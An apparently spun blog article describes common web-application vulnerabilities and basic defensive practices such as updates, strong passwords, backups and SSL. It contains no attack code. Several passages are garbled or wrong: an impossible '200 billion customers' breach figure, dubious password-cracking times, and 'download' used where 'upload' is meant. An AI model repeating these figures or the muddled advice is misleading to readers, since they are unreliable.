How to improve your website/web app security
This post examines the state of website/web app security, by the simple Technics. It also discusses the most effective way for organizations to achieve sustainable improvements in their website/web app security of the code they put on or remove the Website.
Most Common Website Security/web app Vulnerabilities
One of treatment of website security is the SQL injection. SQL injection is a type of website security vulnerability in which the hackers attempts to use program code to access or take down database content. If prospering, this allows the hackers to insert, read, retrieve, alter, or delete data stored in the back-end database. SQL injection is one of the most common types of website security vulnerabilities.
CROSS SITE SCRIPTING (XSS)
BROKEN AUTHENTICATION & SESSION MANAGEMENT
Broken authentication and session management contain many security subjects, all of them having to do with retaining the identity of a client. If authentication certificate and session identifiers are not preserved or protected at all times a hacker can hijack an active session and take the identity of a user.
INSECURE DIRECT OBJECT REFERENCES
Insecure direct object reference is when a website display a reference to an internal implementation entity. Internal implementation entity contains files, database records, directories and database indexes. When an application display a reference to one of these entity in a URL attacker can administrate it to gain access to a user’s private data.
This technique is used by a hacker who is already a valid user. They simply change a restriction value to refer a system object to another object to increase access to other data and accordance it. All object parameters must have proper defenses by asking for authorization to specific resources and restrict indirect parameters to values authorized for the valid user.
Security misconfiguration include many types of vulnerabilities all concentrate on a lack of maintenance or a lack of attention to the web application configuration. A secure configuration must be prepared and deployed for the application, frameworks, application server, web server, database server and platform. Security misconfiguration gives attacker access to personal data or aspect and can result in a complete system reconciliation.
Default accounts, unused pages, unpatched faults, and directories can all be accessed by hackers to increase unauthorized access. Appropriate security tightening should be performed across the entire application stack to prevent this hacking. Software (including ALL code libraries) should be kept up-to-date and dispensable ports, services, pages, accounts, etc. should be deleted. The security configurations in development frameworks such as spring, Struts… should be configured properly.
CROSS-SITE REQUEST FORGERY (CSRF)
Cross-Site Request Forgery (CSRF), also known as XSRF, is a flagitious offensive that forces an end user to run unwanted actions on a website in which they’re currently authenticated. A third-party website will send a request to a web application that a user is already authenticated against (e.g. their bank). The hacker can then access functionality via the victim’s already authenticated browser.
A successful CSRF attack can be destroying for both the business and user. It can result in corrupted client relationships, unauthorized fund transfers, changed passwords and data theft—including stolen session cookies.
Insufficient Transport Layer Protection
If client network traffic is not observed completely, an attacker can expose data and steal accounts. A bad SSL configuration can even assist MITM or phishing attacks. The easiest way is to require SSL for the entire site or at least on private pages. The SSL provider should support only powerful algorithms and the secure flag should be on all cookies.
Failure to Restrict URL Access
This vulnerability is so easy to use that it must not be ignored. If the security hole exists, a hacker as an authorized user, or possibly not, could directly modify a URL to access a privileged page and possibly increase rapidly their privileges further. Developers must verify every single page and make sure external security methods or code level protections are configured exactly for each page. Policies should be highly configurable to minimize hard coded issues, and enforcement mechanisms should decline access by default by requiring specific access for users.
Invalidated Redirects and Forwards
In this method, a hacker links to an invalidated redirect and tries to trick visitors or clients into clicking the link. Since the link is to an authorized site users are more likely to be fraud. The hacker targets insecure forwards to bypass safe checks. The simplest way is to avoid using redirect and forwards altogether. You can also have them calculate the destination without involving user restriction. If these two solutions can’t be accomplish, then make sure that the supplied values for parameters are valid and authorized for the user
Insecure Cryptographic Storage
Generally, attacker won’t break through the cryptography directly. In lieu of they’ll find keys, get clear text copies of data, or find channels that automatically decode. To protect decoded data, you must encrypt it in every area where it is stored long-term. Decrypted copies of the data and keys must be preserved by requiring authorization.
HOW TO MAKE YOUR WEBSITE/web app security (SECURE) :
cyber-attack are increasing in eminence every day, from influencing major election to paralyze business overnight, the pattern cyber belligerence plays in our quotidian lives should not be downgrade. While a tremendous statistic, there are many harness you can do to certify that your website is as secure as possible. Below you will find the some important issues you can decrease the chances of your website being attacked.
Update And Do It Often
You must face the hard fact that you will get hacked, if you are not updating all software and hardware in your business contains those that are used for your website on a regular basis then. It is not a matter of ‘if’ but rather a matter of ‘when’. Although updating everything can be a harassment, especially when you are trying to run a business, not updating will, at best, cause disappointment and, at worst-case, put your company out of business for fine.
According to ITRC Data Breach Reports 31 march 2019, more than 50 % of security breaches were targeted at businesses and that affected near 200 billion customers and over 18 million records. This means updating servers, website platforms and plug-ins, as well as your computer software and hardware, firewalls, and every type of software and hardware that keeps your business running.
Stay Updated On Latest Threats
In addition to keeping your hardware and software at your fingertips, it’s a good idea to keep up-to-date with the latest cyber security crimes around the world. To do this, the best solution is to search for “IT Security News” and inform yourself about the latest and most important threats reported.
An IT company serving your business is the best way to limit data breaches. Keeping up to date and discussing how these new threats could affect your business will go a long way towards preventing problems .they are able to support your website/web app security.
Passwords and 2-Factor Authentication
This one does not seem to have to be said because it’s so simple. Unfortunately, people still do not take the security of passwords seriously enough. Yes, it is painful to constantly try to create a secure password and it is even harder to remember what it is once you do it, but it is absolutely necessary to do it.
Hackers have perfect control over the places they should not enter. A weak password is like leaving the door open at home with a note saying “Take What You Want”! So commit to being someone who does not let problems have easy access. Here are some reliable and authentic methods for creating secure passwords.this case is one factors that could be assured your website/web app security.
1) They must be complex and random.
Do not use your name, date of birth, animal name, child’s name, favorite team or sports team, etc. These types of passwords are very easy to guess with minimal information about you. Use uppercase and lowercase letters, numbers, and symbols in your passwords.
2) Passwords must be at least 12 characters long.
The longer the password, the harder it is for a hacker to guess. For example, a password with only 7 characters takes only 0.29 milliseconds to crack, a 9-character password takes 5 days to crack, and a 10-character password takes 4 months. Wondering how long this 12-character password would crack? A huge 2 centuries!.
3) The passwords must be unique.
Do not reuse passwords. Every time you create a new password, it must be unique. In doing so, it is very difficult to be a victim of a security breach. If one of your passwords is decrypted, it will not affect all your accounts. Hackers love to discover a person’s password, because it then accesses all the sites it can for that same person and tries it again and again. Statistically, since humans are very predictable, they will hit the jackpot of multiple accounts with this password they calculated.
Most people do not follow these simple password rules for one reason and one: they are afraid of not remembering the password. It’s a reasonable fear. However, we all have it, it is a problem that we all face and need to overcome, and there are some things you can do to help you in this process.
1) Use a password manager.
There are many around and many of them are free. Stay on those who are known as LastPass, KeePass or 1Password. There are many others too, so research and choose the one that’s right for you. These password managers store not only your passwords for you, but they can also generate and change a password for you.
2) Create a formula for creating your password.
There are many ways to create a formula, but this one should suit you best. For ideas on how to create passwords using different formulas.
Only One Website per Server
If you or your company has multiple websites, make sure each website is hosted on its own server. Many people think that if they have an unlimited web hosting plan, they can also put all the websites in one place, but doing so is very risky. Why? Because if a hacker manages to access your server, he can access all your websites and databases at once.
Once the hackers are on your site, they can steal all the sensitive data and infect the site with malware. If you have multiple sites on the same server, you may also be infected. So make sure each website has its own hosting plan and its own server. That way, if one site is hacked, all the others are safe. Also make sure that the passwords of all your websites are different.
Control of access to the website
The basic rule is that you only give access to your website to those who absolutely need it and those who have access to it, but give them as much access as they need to do their work. This is called the principle of least privilege.
Too many people who access the website make it not only more vulnerable to security breaches, but also to human errors. The more people who have fun, the more likely it is that something serious will happen.
Among those who are allowed access, make sure they all have their own login and password and are allowed to perform only the tasks they should be allowed to perform. It is also wise to put in place a strategy that describes the regular review of access permissions and removes those that have changed or left the organization. The higher the number of accounts available, the greater the number of potential “hackers” to enter. Close all “doors” that are no longer needed.
Backup and do it often
This one ranks with strong passwords. This is something that most people at least know is important, but too many do not. If you’re one of these people, your chances of recovering your data and restoring your business quickly are virtually nil. With frequent backups, your company’s website and all of its data can be returned to service quickly, reducing downtime for your business.
But it’s not just about having regular backups, it’s important. You should also periodically check backups of your website to make sure they are complete and not corrupted. In a survey conducted by Barkly, 100% of computer scientists surveyed said they were actively safeguarding their data and 80% of them said they were confident they could fully recover their data in the event of a security breach. In fact, only 40% of ransom-ware victims were able to recover all their data from backups. The main reason for this failure was failed backups and unsaved backups, which resulted in data loss gaps.
Backups will not prevent your site from being hacked, however, it will be faster to make it work once it has been hacked. Make sure that not only the website’s files are backed up, but also the databases involved.
Get an SSL certificate (HTTP) for your website/web app security
Although SSL certification does not protect your website from hackers, it protects information sent from your website to your users’ browsers by encrypting all communications. This is something that every website should have, especially if it is an e-commerce site that takes information about payments.
However, all websites would benefit from having SSL certification to secure all their communications. With all security vulnerabilities, savvy users are becoming more and more used to looking for the “https” symbol at the beginning of a website’s URL, as well as the green lock to the left of the URL. to make sure their communications are secure. Ensure peace of mind for visitors to your website by encrypting communications using SSL certification.
Disable automatic form filling
Do you know the contact form you have on your website? Did you know that some websites allow visitors who regularly visit your site to automatically fill out forms with all their information? Well, this form is not really a good thing for your visitors or your business. If their computer or phone is stolen, a hacker can access your website by automatically entering information about the victim. Make sure that the automatic entry feature is disabled on your website. Although convenient for lazy visitors to your site, this is a security breach that you should not leave outside.
Limit or eliminate file downloads
Any website that allows the downloading of files on its site gives free rein to a security breach and does not have to be a hacker who downloads a file containing viruses. This can be someone who does not know that his file contains a virus. Regardless of the level of security that you have on your system to check files, viruses can pass and, as soon as they do, any hacker can access your website and all its data.
Of course, the best practice would be to accept no downloads on your website. However, it is sometimes necessary to allow file downloads for various reasons. If this is the case with your website, make sure that all files downloaded to your site are stored outside the root directory. If you do not know how to do this, your web host can help you make it work(website/web app security).
Do not store payment data on your servers
Everything you store on your servers can be stolen in the event of a security breach and you cannot store certain types of data. However, you must take responsibility for certain types of information, including payment data.
That’s why it’s best to let e-commerce providers that you use for payment processing store and protect the data on their servers. They are more willing to protect this type of data.
So, now that you know some of the main things you can do to secure your website, make sure to create an action plan for website/web app security and put everything in place immediately. You will never regret being proactive.